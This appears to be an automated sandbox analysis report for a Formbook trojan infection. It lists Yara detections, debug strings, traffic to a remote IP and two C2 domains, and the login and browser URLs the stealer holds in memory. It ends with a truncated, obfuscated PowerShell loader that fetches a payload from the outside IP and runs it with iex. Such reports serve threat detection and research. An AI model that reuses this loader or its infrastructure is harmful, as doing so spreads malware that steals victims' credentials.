Source: Yara match |
File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Source: |
Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp |
Source: |
Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp |
Source: |
Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: global traffic |
HTTP traffic detected: GET /domkapitler.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /AKaUDBTG140.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jackcliu.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 |
Source: global traffic |
HTTP traffic detected: GET /u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.smartfindsdepot.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2516302962.000002431EC0E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163 |
Source: wab.exe, 0000000A.00000002.2619504780.0000000004332000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163// |
Source: wab.exe, 0000000A.00000002.2632499102.000000001F2F0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin |
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin/ |
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.binb |
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin~OU |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/domkapitler.msiP |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/domkapitler.msiXR |
Source: powershell.exe, 00000002.00000002.2516302962.000002431EDC4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.H |
Source: powershell.exe, 00000005.00000002.2451195111.00000000070E0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microv |
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.smartfindsdepot.shop |
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.smartfindsdepot.shop/u88q/ |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2516302962.000002431E15B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com:: |
Source: recover.exe, 0000000D.00000003.3123298265.0000000007BC0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login. |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live. |
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: Yara match |
File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Source: amsi64_7108.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_1364.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a |